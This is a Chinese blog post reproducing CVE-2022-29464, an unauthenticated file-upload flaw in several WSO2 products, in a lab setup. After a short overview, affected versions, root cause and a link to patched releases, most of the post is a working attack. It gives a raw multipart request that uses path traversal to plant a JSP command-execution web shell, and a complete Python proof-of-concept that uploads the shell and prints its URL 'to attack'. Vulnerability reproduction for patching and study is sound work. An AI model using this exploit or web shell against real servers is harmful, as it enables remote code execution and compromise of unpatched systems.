CVE-2022-29464 WSO2文件上传漏洞
2022/7/23 23:26:35
本文主要是介绍CVE-2022-29464 WSO2文件上传漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一、漏洞概述
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
二、影响版本
- WSO2 API Manager 2.2.0 及更高版本到 4.0.0
- WSO2 Identity Server 5.2.0 及以上至 5.11.0
- WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0
- WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0
- WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0
三、漏洞原理
WSO2的配置文件 WSO2AM_Home\repository\conf\identity\identity.xml中,修饰 /fileupload(.*) 接口的 secured 属性为 false,这就意味着路由资源访问可以不需要身份验证,从而可以通过构造恶意的post请求包达到恶意jsp文件上传的目的。详情大佬文章点这里~
四、漏洞复现环境
Kali Linux + Vulfocus
渗透机:Kali Linux
靶机:Vulfocus
五、实验步骤
1.开启镜像环境,访问WSO2 https://ip:port/carbon/admin/login.jsp
2.抓包且构造漏洞利用的请求包,回应包中出现如下数字即上传文件成功(此处上传的是wavesky.jsp)
1 POST /fileupload/toolsAny HTTP/1.1
2 Host: 192.168.117.131:16630
3 Accept: */*
4 Accept-Encoding: gzip, deflate
5 Content-Length: 905
6 Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
7 User-Agent: python-requests/2.22.0
8
9
10 --4ef9f369a86bfaadf5ec3177278d49c0
11 Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"
12
13 <FORM>
14 <INPUT name='cmd' type=text>
15 <INPUT type=submit value='Run'>
16 </FORM>
17 <%@ page import="java.io.*" %>
18 <%
19 String cmd = request.getParameter("cmd");
20 String output = "";
21 if(cmd != null) {
22 String s = null;
23 try {
24 Process p = Runtime.getRuntime().exec(cmd,null,null);
25 BufferedReader sI = new BufferedReader(new
26 InputStreamReader(p.getInputStream()));
27 while((s = sI.readLine()) != null) { output += s+"</br>"; }
28 } catch(IOException e) { e.printStackTrace(); }
29 }
30 %>
31 <pre><%=output %></pre>
32 --4ef9f369a86bfaadf5ec3177278d49c0--
3.接下来就可以执行linux命令查看内部配置了
六、修复方式
更新至安全版本——https://github.com/wso2/product-apim/releases
七、Poc
import requests
import argparse
def exploit(url):
uurl = "https://"+url+"/fileupload/toolsAny"
shell = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp": shell}
response = requests.post(url=uurl,files=files,verify=False)
if(response.status_code == 200):
print('It looks likely vulnerable')
print('Please use this url:'+'{\33[91m'+'https://'+url+'/authenticationendpoint/wavesky.jsp'+'\33[0m}'+' to view and attack~')
else:
print('It is strong')
if __name__ == '__main__':
parameter = argparse.ArgumentParser(description='Poc CVE-2022-29464:')
parameter.add_argument('--file',help='url file',required=False)
parameter.add_argument('--url',help='ip:port',required=False)
para = parameter.parse_args()
if para.url:
exploit(para.url)
exit()
else:
parameter.print_help()
这篇关于CVE-2022-29464 WSO2文件上传漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升
